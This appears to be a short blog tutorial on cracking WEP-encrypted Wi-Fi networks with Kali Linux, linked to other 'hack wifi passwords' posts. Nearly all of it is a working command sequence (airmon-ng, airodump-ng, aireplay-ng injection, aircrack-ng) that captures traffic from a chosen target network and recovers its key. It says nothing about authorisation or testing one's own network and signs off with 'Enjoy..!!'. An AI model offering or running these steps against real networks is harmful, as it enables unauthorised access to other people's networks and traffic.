Cracking Wifi With Kali Linux (WEP Networks)

Before we start.

I would recommend you to Install Kali Linux on your PC.

Don’t Miss : How To Hack Wifi Passwords

Cracking WiFi (W.P.S BruteForce)


Cracking WPA/WPA-2 Networks

WEP Cracking.

WEP is very easy and fast to crack. Here are the steps:-
  • Put your Wireless Interface into Monitor Mode:
                airmon-ng start wlan0
  • Get Info from the Available Networks:
                airodump-ng mon0
  • Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
                     airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.
  • To boost the proccedure type on a new terminal:
               aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network)
  • When this command is done, capture packets by typing:
                    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address)
  • When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
                    aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)
  • When aircrack-ng finds the key it will display something like:
                    KEY FOUND! [ 12:34:56:78:90 ]
(In this example our key is ’1234567890′)
  • When Finished, make sure you put your wireless interface back to original Mode by typing:
                    airmon-ng stop wlan0Enjoy..!!

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